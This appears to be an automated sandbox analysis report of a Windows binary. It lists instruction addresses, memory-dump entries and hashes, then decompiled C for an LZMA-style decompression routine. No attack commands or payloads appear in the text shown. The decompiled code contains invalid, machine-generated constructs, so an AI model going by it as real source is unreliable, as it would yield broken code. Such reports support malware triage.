                                                                                0x00000000
                                                                                0x004066e4
                                                                                0x004066e4
                                                                                0x004066e8
                                                                                0x00406820
                                                                                0x00000000
                                                                                0x00406820
                                                                                0x004066ee
                                                                                0x004066f1
                                                                                0x004066f4
                                                                                0x004066f8
                                                                                0x004066fb
                                                                                0x00406701
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406706
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x0040670c
                                                                                0x0040670c
                                                                                0x00406710
                                                                                0x00406770
                                                                                0x00406773
                                                                                0x00406778
                                                                                0x00406779
                                                                                0x0040677b
                                                                                0x0040677d
                                                                                0x00406780
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x00000000
                                                                                0x0040668c
                                                                                0x00406712
                                                                                0x00406718
                                                                                0x0040671b
                                                                                0x0040671e
                                                                                0x00406721
                                                                                0x00406724
                                                                                0x00406727
                                                                                0x0040672a
                                                                                0x0040672d
                                                                                0x00406730
                                                                                0x00406733
                                                                                0x0040674c
                                                                                0x0040674f
                                                                                0x00406752
                                                                                0x00406755
                                                                                0x00406759
                                                                                0x0040675b
                                                                                0x0040675b
                                                                                0x0040675c
                                                                                0x0040675f
                                                                                0x00406735
                                                                                0x00406735
                                                                                0x0040673d
                                                                                0x00406742
                                                                                0x00406744
                                                                                0x00406747
                                                                                0x00406747
                                                                                0x00406762
                                                                                0x00406769
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x00000000
                                                                                0x00406407
                                                                                0x0040640a
                                                                                0x00406440
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406573
                                                                                0x00406573
                                                                                0x00406576
                                                                                0x00406578
                                                                                0x00406802
                                                                                0x00000000
                                                                                0x00406802
                                                                                0x0040657e
                                                                                0x00406581
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406587
                                                                                0x0040658b
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x00000000
                                                                                0x0040658e
                                                                                0x0040640c
                                                                                0x0040640e
                                                                                0x00406410
                                                                                0x00406412
                                                                                0x00406415
                                                                                0x00406416
                                                                                0x00406418
                                                                                0x0040641a
                                                                                0x0040641d
                                                                                0x00406420
                                                                                0x00406436
                                                                                0x0040643b
                                                                                0x00406473
                                                                                0x00406473
                                                                                0x00406477
                                                                                0x004064a3
                                                                                0x004064a5
                                                                                0x004064ac
                                                                                0x004064af
                                                                                0x004064b2
                                                                                0x004064b2
                                                                                0x004064b7
                                                                                0x004064b7
                                                                                0x004064b9
                                                                                0x004064bc
                                                                                0x004064c3
                                                                                0x004064c6
                                                                                0x004064f3
                                                                                0x004064f3
                                                                                0x004064f6
                                                                                0x004064f9
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x00000000
                                                                                0x0040656d
                                                                                0x004064fb
                                                                                0x00406501
                                                                                0x00406504
                                                                                0x00406507
                                                                                0x0040650a
                                                                                0x0040650d
                                                                                0x00406510
                                                                                0x00406513
                                                                                0x00406516
                                                                                0x00406519
                                                                                0x0040651c
                                                                                0x00406535
                                                                                0x00406537
                                                                                0x0040653a
                                                                                0x0040653b
                                                                                0x0040653e
                                                                                0x00406540
                                                                                0x00406543
                                                                                0x00406545
                                                                                0x00406547
                                                                                0x0040654a
                                                                                0x0040654c
                                                                                0x0040654f
                                                                                0x00406553
                                                                                0x00406555
                                                                                0x00406555
                                                                                0x00406556
                                                                                0x00406559
                                                                                0x0040655c
                                                                                0x0040651e
                                                                                0x0040651e
                                                                                0x00406526
                                                                                0x0040652b
                                                                                0x0040652d
                                                                                0x00406530
                                                                                0x00406530
                                                                                0x0040655f
                                                                                0x00406566
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406566
                                                                                0x00406479
                                                                                0x0040647c
                                                                                0x0040647e
                                                                                0x00406481
                                                                                0x00406484
                                                                                0x00406487
                                                                                0x00406489
                                                                                0x0040648c
                                                                                0x0040648f
                                                                                0x0040648f
                                                                                0x00406492
                                                                                0x00406492
                                                                                0x00406495
                                                                                0x0040649c
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649c
                                                                                0x00406422
                                                                                0x00406425
                                                                                0x00406427
                                                                                0x0040642a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406189
                                                                                0x00406189
                                                                                0x0040618d
                                                                                0x004067d2
                                                                                0x00000000
                                                                                0x004067d2
                                                                                0x00406193
                                                                                0x00406196
                                                                                0x00406199
                                                                                0x0040619c
                                                                                0x0040619f
                                                                                0x004061a2
                                                                                0x004061a5
                                                                                0x004061a7
                                                                                0x004061aa
                                                                                0x004061ad
                                                                                0x004061b0
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406314
                                                                                0x00406314
                                                                                0x00406318
                                                                                0x004067de
                                                                                0x00000000
                                                                                0x004067de
                                                                                0x0040631e
                                                                                0x00406321
                                                                                0x00406324
                                                                                0x00406327
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x0040632c
                                                                                0x0040632f
                                                                                0x00406332
                                                                                0x00406335
                                                                                0x00406338
                                                                                0x0040633b
                                                                                0x0040633c
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x00406341
                                                                                0x00406344
                                                                                0x00406347
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634d
                                                                                0x0040634f
                                                                                0x0040634f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406595
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040659b
                                                                                0x0040659e
                                                                                0x004065a1
                                                                                0x004065a4
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b2
                                                                                0x004065b5
                                                                                0x004065b8
                                                                                0x004065b9
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065be
                                                                                0x004065c1
                                                                                0x004065c4
                                                                                0x004065c7
                                                                                0x004065ca
                                                                                0x004065ce
                                                                                0x004065d0
                                                                                0x004065d3
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00000000
                                                                                0x00406352
                                                                                0x004065d3
                                                                                0x00406808
                                                                                0x0040682a
                                                                                0x00406830
                                                                                0x00406832
                                                                                0x00406839
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x0040683f
                                                                                0x0040683f
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: eefbc5b05c9546ff0cad76eb34e0ab98eb9a4ec1c211ae52e274f7609b12dec2
                                                                                • Instruction ID: 909bdde558f57e7ac800e5a0ddc2dabeacf06fc65e9abcdd7f0269cfd7f89115
                                                                                • Opcode Fuzzy Hash: eefbc5b05c9546ff0cad76eb34e0ab98eb9a4ec1c211ae52e274f7609b12dec2
                                                                                • Instruction Fuzzy Hash: 14817732D04229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1D7785A86DF84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406243, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E00406243() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406847))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
